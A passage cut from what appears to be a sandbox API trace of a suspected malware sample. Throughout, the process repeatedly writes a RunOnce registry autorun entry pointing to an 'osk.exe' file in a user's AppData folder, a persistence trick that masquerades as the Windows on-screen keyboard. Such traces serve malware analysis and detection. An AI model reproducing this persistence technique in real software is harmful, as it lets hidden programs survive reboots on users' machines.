HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.420] RegCloseKey (hKey=0x280) returned 0x0 [0083.420] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.420] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.420] SetTimer (hWnd=0x20280, nIDEvent=0x212f, uElapse=0xa, lpTimerFunc=0x0) returned 0x212f [0083.420] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.435] KillTimer (hWnd=0x20280, uIDEvent=0x212f) returned 1 [0083.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.436] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.436] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.436] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.436] RegCloseKey (hKey=0x280) returned 0x0 [0083.436] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.436] SetTimer (hWnd=0x20280, nIDEvent=0x2130, uElapse=0xa, lpTimerFunc=0x0) returned 0x2130 [0083.436] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.450] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.450] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.450] KillTimer (hWnd=0x20280, uIDEvent=0x2130) returned 1 [0083.451] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.451] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.451] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.451] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.451] RegCloseKey (hKey=0x280) returned 0x0 [0083.451] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.452] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.452] SetTimer (hWnd=0x20280, nIDEvent=0x2131, uElapse=0xa, lpTimerFunc=0x0) returned 0x2131 [0083.452] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.465] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.465] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.466] KillTimer (hWnd=0x20280, uIDEvent=0x2131) returned 1 [0083.466] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.466] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.466] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.467] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.467] RegCloseKey (hKey=0x280) returned 0x0 [0083.467] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.467] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.467] SetTimer (hWnd=0x20280, nIDEvent=0x2132, uElapse=0xa, lpTimerFunc=0x0) returned 0x2132 [0083.467] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.481] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.481] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.481] KillTimer (hWnd=0x20280, uIDEvent=0x2132) returned 1 [0083.482] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.482] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.482] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.482] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.482] RegCloseKey (hKey=0x280) returned 0x0 [0083.483] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.483] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.483] SetTimer (hWnd=0x20280, nIDEvent=0x2133, uElapse=0xa, lpTimerFunc=0x0) returned 0x2133 [0083.483] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.497] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.497] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.497] KillTimer (hWnd=0x20280, uIDEvent=0x2133) returned 1 [0083.497] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.497] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.498] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.498] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.498] RegCloseKey (hKey=0x280) returned 0x0 [0083.498] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.498] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.498] SetTimer (hWnd=0x20280, nIDEvent=0x2134, uElapse=0xa, lpTimerFunc=0x0) returned 0x2134 [0083.498] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.512] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.512] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.512] KillTimer (hWnd=0x20280, uIDEvent=0x2134) returned 1 [0083.513] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.513] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.513] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.513] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.514] RegCloseKey (hKey=0x280) returned 0x0 [0083.514] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.514] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.514] SetTimer (hWnd=0x20280, nIDEvent=0x2135, uElapse=0xa, lpTimerFunc=0x0) returned 0x2135 [0083.514] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.528] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.528] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.528] KillTimer (hWnd=0x20280, uIDEvent=0x2135) returned 1 [0083.529] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.529] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.529] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.529] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.529] RegCloseKey (hKey=0x280) returned 0x0 [0083.530] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.530] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.530] SetTimer (hWnd=0x20280, nIDEvent=0x2136, uElapse=0xa, lpTimerFunc=0x0) returned 0x2136 [0083.530] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.544] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.544] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.544] KillTimer (hWnd=0x20280, uIDEvent=0x2136) returned 1 [0083.544] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.545] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.545] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.545] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.545] RegCloseKey (hKey=0x280) returned 0x0 [0083.545] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.545] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.545] SetTimer (hWnd=0x20280, nIDEvent=0x2137, uElapse=0xa, lpTimerFunc=0x0) returned 0x2137 [0083.546] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.606] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.606] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.606] KillTimer (hWnd=0x20280, uIDEvent=0x2137) returned 1 [0083.606] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.607] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.607] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.607] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.607] RegCloseKey (hKey=0x280) returned 0x0 [0083.607] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.607] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.608] SetTimer (hWnd=0x20280, nIDEvent=0x2138, uElapse=0xa, lpTimerFunc=0x0) returned 0x2138 [0083.608] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.621] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.621] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.622] KillTimer (hWnd=0x20280, uIDEvent=0x2138) returned 1 [0083.622] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.622] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.622] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.623] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.623] RegCloseKey (hKey=0x280) returned 0x0 [0083.623] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.623] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.623] SetTimer (hWnd=0x20280, nIDEvent=0x2139, uElapse=0xa, lpTimerFunc=0x0) returned 0x2139 [0083.623] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.637] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.637] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.637] KillTimer (hWnd=0x20280, uIDEvent=0x2139) returned 1 [0083.637] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.638] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.638] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.638] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.638] RegCloseKey (hKey=0x280) returned 0x0 [0083.638] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.638] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.638] SetTimer (hWnd=0x20280, nIDEvent=0x213a, uElapse=0xa, lpTimerFunc=0x0) returned 0x213a [0083.639] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.653] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.653] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.653] KillTimer (hWnd=0x20280, uIDEvent=0x213a) returned 1 [0083.654] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.654] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.654] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.654] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.654] RegCloseKey (hKey=0x280) returned 0x0 [0083.654] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.654] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.655] SetTimer (hWnd=0x20280, nIDEvent=0x213b, uElapse=0xa, lpTimerFunc=0x0) returned 0x213b [0083.655] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.668] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.668] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.668] KillTimer (hWnd=0x20280, uIDEvent=0x213b) returned 1 [0083.669] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.669] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.669] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.669] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.669] RegCloseKey (hKey=0x280) returned 0x0 [0083.669] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.670] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.670] SetTimer (hWnd=0x20280, nIDEvent=0x213c, uElapse=0xa, lpTimerFunc=0x0) returned 0x213c [0083.670] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.684] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.684] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.684] KillTimer (hWnd=0x20280, uIDEvent=0x213c) returned 1 [0083.684] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.685] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.685] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.685] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.685] RegCloseKey (hKey=0x280) returned 0x0 [0083.685] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.685] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.685] SetTimer (hWnd=0x20280, nIDEvent=0x213d, uElapse=0xa, lpTimerFunc=0x0) returned 0x213d [0083.685] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.699] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.699] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.700] KillTimer (hWnd=0x20280, uIDEvent=0x213d) returned 1 [0083.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.700] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.700] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.700] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.701] RegCloseKey (hKey=0x280) returned 0x0 [0083.701] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.701] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.701] SetTimer (hWnd=0x20280, nIDEvent=0x213e, uElapse=0xa, lpTimerFunc=0x0) returned 0x213e [0083.701] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.725] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.725] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.725] KillTimer (hWnd=0x20280, uIDEvent=0x213e) returned 1 [0083.726] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.726] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.726] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.726] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.727] RegCloseKey (hKey=0x280) returned 0x0 [0083.727] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.727] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.727] SetTimer (hWnd=0x20280, nIDEvent=0x213f, uElapse=0xa, lpTimerFunc=0x0) returned 0x213f [0083.727] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.731] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.731] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.731] KillTimer (hWnd=0x20280, uIDEvent=0x213f) returned 1 [0083.731] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.732] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.732] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.732] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.732] RegCloseKey (hKey=0x280) returned 0x0 [0083.732] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.732] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.732] SetTimer (hWnd=0x20280, nIDEvent=0x2140, uElapse=0xa, lpTimerFunc=0x0) returned 0x2140 [0083.732] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.746] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.746] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.746] KillTimer (hWnd=0x20280, uIDEvent=0x2140) returned 1 [0083.747] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.747] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0083.747] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0083.747] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0083.747] RegCloseKey (hKey=0x280) returned 0x0 [0083.748] IUnknown:Release (This=0x7a9740) returned 0x1 [0083.748] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.748] SetTimer (hWnd=0x20280, nIDEvent=0x2141, uElapse=0xa, lpTimerFunc=0x0) returned 0x2141 [0083.748] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0083.762] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0083.762] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0083.762] KillTimer (hWnd=0x20280, uIDEvent=0x2141) returned 1 [0083.763] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0083.763] _mbsnbcmp (_Str1=0x33ec50, 